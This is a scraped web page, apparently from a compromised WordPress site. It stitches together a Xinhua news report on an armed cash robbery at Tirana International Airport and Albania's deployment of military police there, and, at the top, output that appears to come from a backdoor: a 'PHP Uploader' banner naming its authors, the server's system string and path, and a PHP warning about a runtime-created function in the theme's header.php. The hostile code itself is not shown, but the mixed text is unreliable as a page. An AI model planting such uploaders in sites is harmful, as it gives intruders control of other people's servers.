PHP Uploader - By Phenix-TN & Mr.Anderson
Linux iZwz91hdhujjzqy9icuvwuZ 5.4.0-31-generic #35-Ubuntu SMP Thu May 7 20:20:34 UTC 2020 x86_64
okokok/www/wwwroot/aircn/new_wordpress/wordpressokokok
Warning: Use of undefined constant itongtong - assumed 'itongtong' (this will throw an Error in a future version of PHP) in /www/wwwroot/aircn/new_wordpress/wordpress/wp-content/themes/newsbulk/header.php(29) : runtime-created function on line 1

新华社地拉那4月10日电(记者章亚东)阿尔巴尼亚国防部长奥尔塔·扎卡10日宣布,自地拉那国际机场9日发生巨额现金劫案后,阿武装部队将进驻案发机场以加强安保。

扎卡在新闻发布会上说,她已命令军事警察部队和一个特种空军营进驻地拉那国际机场并在周边设立安全区,以加强安保工作。

数名武装劫匪9日混入地拉那国际机场,在奥地利航空公司一架飞机装载现金时劫走大量现金,一名劫匪在与警方交火时被击毙。阿媒体报道说,被盗现金达近1000万欧元(约合7570万元人民币)。

阿尔巴尼亚总统梅塔说,这一事件对国家安全、公共秩序和国家形象构成严重威胁,他要求有关部门尽快找到劫匪。

因阿尔巴尼亚银行不接收外币,所以外币大多通过地拉那国际机场转运至国外。

声明:转载此文是出于传递更多信息之目的。若有来源标注错误或侵犯了您的合法权益,请作者持权属证明与本网联系,我们将及时更正、删除,谢谢。

来源:新华网

作者 一潼

发表回复